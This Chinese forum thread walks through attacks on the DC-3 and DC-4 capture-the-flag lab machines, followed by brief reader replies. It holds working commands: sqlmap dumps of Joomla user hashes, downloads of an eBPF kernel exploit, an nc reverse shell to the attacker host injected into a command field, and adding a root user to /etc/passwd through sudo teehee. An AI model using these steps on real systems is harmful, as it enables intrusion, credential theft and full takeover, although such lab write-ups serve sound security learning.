yunkof 发表于 2023-7-6 21:58

DC3,DC4靶机详解

本帖最后由 yunkof 于 2023-7-6 22:41 编辑

## 【DC系列03】DC-3靶机复盘

最近打了特别多的靶机,DC系列已经打完了,还打了一些别的靶机,有特别难的,也有很简单的,现在发现打靶机真的好玩,甚至有点上瘾,还学习到了很多工具的用法,陆续把DC系列发完就发别的靶机,再发一些工具的用法,教程中如果有看不懂的,或者觉得我少步骤的,留言就可以,我会补充的,放心,每天我都会在论坛冲浪,可能不发言,但一定会在论坛飘来飘去。
下载地址:https://www.five86.com/downloads.html
刚开始我的虚拟机导入靶机,打开时会出现这个错误,只需要添加一个硬盘就可以,选择IDE的。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230627212438435.png)

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230627212621242.png)

然后我们扫描一下靶机ip地址

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630204512930.png)

扫出来以后再单独扫描一下这个网站。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630204531769.png)

登陆这个ip以后指纹识别发现这个网站CMS是Joomla,我知道一个专门针对joomla的扫描工具,我们扫描一下。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230701191857913.png)

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630211441771.png)

我们扫描出两个重要内容,一个是joomla的版本,一个是他的登陆页面。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630211429434.png)

我们针对这个版本搜索一下他的漏洞,发现刚好有一个可以利用的,我们下载下来。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630211950167.png)

发现这是一个sql注入的漏洞,可以可以sqlmap这个工具实现sql注入,不懂的可以单独搜索一下sqlmap这个工具。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630212013471.png)

```
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list=updatexml" --risk=3 --level=5 --random-agent --dbs -p list
```

```
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables-p list
```

```
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns-p list
```

```
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password,username" --dump-p list
```

经过一系列操作我们成功拿到了一个账号密码,但是密码是密文的。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630213139751.png)

利用kali自带的john工具爆破一下密码,很快密码就出来了

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630213314214.png)

尝试登陆了一下这个后台,发现成功登陆了上去。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630213456497.png)

在 这里面搜索了一圈,发现一个可以注入php代码的地方,经过尝试很轻易的就做了一个反弹shell。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630214512379.png)



!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630214533811.png)

这里面是有两个主页的模板,这里面有前端代码,可以自己新建php文件,也可以在原本php文件中插入代码。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630214549204.png)

我点进来以后在html文件下面找到了个php文件,然后插入了一段反弹shell。然后关闭这个页面,在最上面一行Close File。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630213935984.png)

点击预览,或者退出这个页面,重新点击这个模板。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630214636323.png)

kali这边就拿到了反弹shell。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630214701977.png)

用python美化一下命令行。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630214734410.png)

在这里面找了一圈并没有发现有什么可以利用的东西,就想到了内核漏洞,专门搜索了一下这个内核漏洞,发现这个系统的发行版本是16.06,内核版本是4.40。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630215112707.png)

搜索一下这个发行版本的漏洞,发现有合适的。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630220835063.png)

下载后cat一下,里面有一个提权代码的路径,我们wget一个这个zip,下载到我们本机上。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630222547744.png)

解压后发现两个文件,一个crasher.tar,一个exploit.tar,我们解压一下exploit.tar,解压出一个目录ebpf_mapfd_doubleput_exploit。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230701214643357.png)

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230630222524138.png)

我们把ebpf_mapfd_doubleput_exploit里面的东西都拷贝到目标主机。

```shell
cd /tmp
wget 192.168.102.129/compile.sh
wget 192.168.102.129/doubleput.c
wget 192.168.102.129/hello.c
wget 192.168.102.129/suidhelper.c
```

然后我们运行./compil.sh。

运行完后出现一个doubleput文件,我们再运行一下./doubleput大概等1分钟就拿到root权限了。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230701211318223.png)

## 【DC系列04】DC-4靶机复盘

首先nmap扫ip,我这里扫出来ip了,然后对这个ip做一个单独的扫描。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703112412188.png)

扫描ip的同时再扫描一下目录,其实目录并没有扫描出来一个什么,有个登陆地址但是转到主目录了。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703112516453.png)

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703112529681.png)

搜寻了一圈并没有什么好利用的点,从这个登陆框很容易看出来登陆用户名是admin,可以根据这个进行一个爆破,很快密码就爆破出来了,是个弱密码。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703084602461.png)

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703084810940.png)

进来以后发现有个Command,点击run发现这是一个ls命令,所以我们就抓包看看能不能修改一下

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703113749032.png)

看到这里空格是用+号代替了,我们尝试放一个反弹shell

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703085133243.png)

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703140018938.png)

```
nc+-e+/bin/bash+192.168.102.129+8888
```

kali这边监听一下,发现获取到了该靶机的webshell

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703102404446.png)

首先使用python命令美化一下命令行。

```
python3 -c "import pty;pty.spawn('/bin/bash')"
```

登陆以后在里面寻找了一下,发现在/home/jim/backups目录下有一个old-passwords.bak文件,这是一个旧密码文件,里面有很多密码,所以就猜测需要用到密码爆破。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703103328620.png)

hydra爆破一下jim用户,很快密码就出来了。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703103640640.png)

远程登陆一下jim用户。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703103711366.png)

登陆到jim用户后在家目录找了一圈发现并没有可以利用的东西,但是在/var下有个mail目录,这是一个邮件目录,所以这里面可能有什么邮件信息比较关键。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703105317334.png)

打开后发现有一个charles写给jim的邮件,里面有charles的密码,我们就尝试登陆一下charles用户。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703105405747.png)

很轻松,顺利就登陆上去了。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703105906466.png)

sudo -l一下发现在有个免密使用root权限的文件/usr/bin/teehee

teehee -help后发现这个文件执行后可以以root权限免密往另一个文件内容后追加内容,所以我们可以利用这个漏洞往/etc/passwd文件下追加一个root用户。

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703112133653.png)

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703112154816.png)

我们的密码追加时候需要以密文的方式追加,如果直接追加明文密码登陆时候会鉴权失败。

这个命令是针对我们的密码和用户输出一个密码的密文。

```
#得到我们要添加的用户的密码。
perl -le 'print crypt("123456", "tang6")'
```

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703112219827.png)

利用sudo teehee和echo命令就可以追加到/etc/passwd

su tang6登陆一下,密码123456,发现已经是root权限了。

```
echo "tang6:tarRU/F9EJjRU:0:0:root::/bin/bash" | sudo teehee -a /etc/passwd
```

!(https://jiangrou.oss-cn-beijing.aliyuncs.com/img/image-20230703112249019.png)

sxaksy 发表于 2023-7-7 21:15

打卡,打卡
发布脱文、破解、算法分析文章时,请不要把正文分为多个回帖进行连接,请整理到一篇正文中发布。(如果后续更新一系列教程可在主题内增加导航链接)
2: 发布脱文、破解、算法分析文章时,请把试炼程序一并上传,便于会员们学习。

li083m 发表于 2023-7-6 22:20

厉害,学习了

tek2y 发表于 2023-7-6 23:27

不明觉厉

sanle2014 发表于 2023-7-6 23:43

厉害了,6666

greattony 发表于 2023-7-7 00:04

需要慢慢消化,感谢

l441669899 发表于 2023-7-7 06:56

厉害,感谢楼主分享!

cyylszsb 发表于 2023-7-7 07:48

厉害了,回去实操一下

lcstwp 发表于 2023-7-7 09:46

非常详细!学习到了{:1_893:}

D3D行者云 发表于 2023-7-7 15:05


厉害,学习了

abs9668 发表于 2023-7-7 16:01

感谢分享~~
页: [1] 2 3
查看完整版本: DC3,DC4靶机详解


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn